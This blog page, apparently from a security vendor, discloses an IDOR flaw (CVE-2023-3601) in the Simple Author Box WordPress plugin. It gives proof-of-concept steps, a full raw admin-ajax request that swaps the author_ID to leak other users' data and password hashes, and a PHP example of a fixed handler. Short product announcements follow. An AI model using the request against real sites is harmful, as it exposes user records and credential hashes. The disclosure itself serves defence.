    During a thorough security assessment, I identified a critical security flaw in the Simple Author Box plugin for WordPress (CVE-2023-3601), specifically affecting versions up to and including 2.51. This vulnerability arises from an Insecure Direct Object Reference (IDOR) issue within the plugin’s code. The plugin fails to properly validate user input when handling requests (action=sab_get_author) to fetch information about specific users, leading to the unauthorized disclosure of sensitive user details.

    Understanding Insecure Direct Object Reference (IDOR)

    Insecure Direct Object Reference is a type of security vulnerability where an application exposes direct references to internal objects, such as files, database records, or resources, without proper access controls. Attackers can manipulate these exposed references (often through changing parameters or input values) to access unauthorized data or functionalities.

    Exploiting the IDOR Vulnerability

    In the context of the Simple Author Box vulnerability, the plugin does not adequately check whether a user is authorized to access specific user information before displaying it. By altering the user ID parameter in a request, an authenticated attacker with Contributor-level permissions or higher can access personal information of other users, including potentially sensitive data such as hashed passwords (CVE-2023-3601).

    POC:

    1. Create a new Post as a Contributor user.

    2. Add the “Simple Author Box” block.

    3. Intercept the request to `/wp-admin/admin-ajax.php` upon addition of the block. Change the `author_ID` parameter to an ID of a user of your choosing.

    4. Inspect the response to see all of the information about that user, including the hashed password.

    POC request:

    POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
    Host: your_site_here
    User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://your_site_here/wordpress/wp-admin/post-new.php
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 50
    Origin: http://your_site_here
    Connection: close
    Cookie: thc_time=1693728697; wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C144c7182810741c5eae1d56f1a732319616b45d658a97cb2467966f1a9fa19de; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome%26hidetb%3D0; wp-settings-time-1=1691260835; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C65dd803dab6a195a6d2c2ff57c23361a622ab5130f1dd3da09ae9076153598ec
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin

    action=sab_get_author&author_ID={here_you_can_put_number_from_0_to_9999}&nonce=bc05e90fd7

    Potential Risks and Real-World Impact

    The IDOR vulnerability in the Simple Author Box plugin introduces severe risks to both website administrators and users. The potential real-world impacts include:

    1. Unauthorized Data Exposure:
      Attackers can view and collect sensitive user information, leading to privacy violations and potential misuse of user data.
    2. Credential Compromise:
      Disclosure of hashed passwords can enable attackers to launch offline attacks, attempting to crack passwords and potentially gain unauthorized access to user accounts.
    3. Identity Impersonation:
      The leaked information could facilitate identity theft or social engineering attacks, compromising the integrity of user accounts and potentially affecting the reputation of the website.

    Recommendations for Improved Security

    To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

    • Immediate Plugin Update:
      The developers of Simple Author Box should release a patched version that addresses the IDOR vulnerability. Website administrators should promptly update to the latest secure version to prevent exploitation.
    • Security Best Practices:
      Plugin developers should adhere to secure coding practices, including input validation, proper access controls, and sanitization of user data.
    • Regular Security Audits:
      Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
    • User Privilege Restriction:
      Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions.
    • User Awareness:
      Educate website administrators and users about the risks of sharing sensitive information and the importance of strong, unique passwords.

    By addressing the IDOR vulnerability in the Simple Author Box plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the privacy and integrity of their users’ data.
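    The “Exploiting the IDOR Vulnerability” section above describes the missing authorization step, and the “User Privilege Restriction” recommendation describes the fix in general terms. The following is an added example, written for this article, of what an admin-ajax handler that looks up an author for a block preview looks like when those checks are present. It is not the Simple Author Box code (the plugin’s own handler is not shown on this page): the action name `example_get_author`, the function name and the nonce action are our own assumptions; every WordPress function used is a standard API.

```php
<?php
/**
 * Illustrative example (not the Simple Author Box code): an admin-ajax
 * handler that returns author details for an editor preview without the
 * IDOR described above. Action, function and nonce names are ours.
 */
add_action( 'wp_ajax_example_get_author', 'example_get_author_ajax' );

function example_get_author_ajax() {
    // 1. The nonce proves the request came from a form we issued to this
    //    logged-in user; it is not an authorization check by itself.
    check_ajax_referer( 'example_get_author', 'nonce' );

    // 2. Validate the identifier before touching the database.
    $author_id = isset( $_POST['author_ID'] ) ? absint( $_POST['author_ID'] ) : 0;
    if ( 0 === $author_id ) {
        wp_send_json_error( 'invalid author id', 400 );
    }

    // 3. Authorization: the step an IDOR is missing. A contributor or
    //    author may look up their own profile; reading other accounts
    //    requires the list_users capability, which only administrators
    //    hold by default.
    if ( $author_id !== get_current_user_id() && ! current_user_can( 'list_users' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $user = get_userdata( $author_id );
    if ( ! $user ) {
        wp_send_json_error( 'not found', 404 );
    }

    // 4. Return an allow-list of public fields. Never serialize the whole
    //    WP_User object: it carries user_pass (the password hash),
    //    user_email and user_activation_key.
    wp_send_json_success( array(
        'id'           => $user->ID,
        'display_name' => $user->display_name,
        'description'  => get_the_author_meta( 'description', $user->ID ),
        'avatar'       => get_avatar_url( $user->ID ),
        'url'          => $user->user_url,
    ) );
}
```

    The two checks that matter for this class of bug are step 3 and step 4: the capability check decides whether the caller may see the record at all, and the allow-list decides which fields leave the server even when they may. A nonce alone, as in the PoC request above, proves only that the caller is a logged-in user who loaded the editor.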

    Use CleanTalk solutions to improve the security of your website

    Dmitrii Ignatyev

    If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


  • Poll: Do you need the option of encrypting/hashing ip/email addresses when transferring to the cloud?

    Poll: Do you need the option of encrypting/hashing ip/email addresses when transferring to the cloud?

    More and more users are concerned about the privacy of the data they send through forms on websites. Sometimes this can lead to forms not being submitted if there is no assurance that the data is completely private.

    We are considering the possibility of hashing all the data that is transferred to the CleanTalk cloud. This will significantly increase the security of your data during transmission. For example:

    Before hashing: em***@ex*****.com
    After hashing: 2a539d6520266b56c3b0c525b9e6128858baeccb5ee9b694a2906e123c8d6dd3

    Attention! If you enable encryption, you will lose access to information about the real IP/Email of the visitor and will not be able to track this data in Anti-Spam reports and logs.

  • Manage your WooCommerce Spam Orders in one place

    Manage your WooCommerce Spam Orders in one place

    Good news, WooCommerce users!

    Now you can find all WooCommerce orders marked as spam in a separate folder. This is designed to ensure you don’t miss any orders and save you time accessing them.

    How to access WooCommerce Spam Orders

    1. Make sure your WooCommerce is properly connected to your website.

    2. Go to your WordPress Dashboard → CleanTalk → Anti-Spam and click on the WooCommerce spam orders link.

      The spam folder can also be accessed from your Anti-Spam plugin settings (Dashboard → Plugins → Installed plugins → Anti-Spam by CleanTalk).

  • White Label Option for Anti-Spam and Security Plugins

    White Label Option for Anti-Spam and Security Plugins

    We are proud to introduce the White Label option for our Anti-Spam and Security plugins. This option gives Unlimited plan users the ability to resell Anti-Spam or Security services to their customers under their own brand name. The Extra Package should be connected as well.

    Here’s what you get

    • Any CleanTalk and affiliate program mentions will be removed.
    • Absolutely all links to CleanTalk.org will be replaced with your custom URL.
    • The contact information of tech support will be replaced with yours.
    • All connection problem reports will be sent to your support email.

    How to connect the White Label option for regular installation (not for Multisite)

    1. Ensure your Unlimited plan and the Extra Package for your Anti-Spam or Security services have been purchased.
    2. In the upper right corner of your Dashboard screen go to your Profile → Settings → Whitelabel Database.
    3. Switch the White Label option to On, fill in the following fields and press the Save button.

    Congratulations! You can now invite your customers to their new control panel.

    How to connect the White Label option for Multisite/Multiuser/WPMS

    In case you are using a Multisite/Multiuser/WPMS version of WordPress, check out these instructions.

  • GDPR compliance notification in comments is no longer supported

    GDPR compliance notification in comments is no longer supported

    A while back, you might have seen a checkbox in the comments of a WordPress website saying that the site visitor had read the agreement and agreed to the site’s GDPR policy. Without the checkbox, you couldn’t submit a comment.

    The feature wasn’t very popular, so we decided to remove it. If you need to comply with GDPR requirements in the future, you can use other solutions to inform users.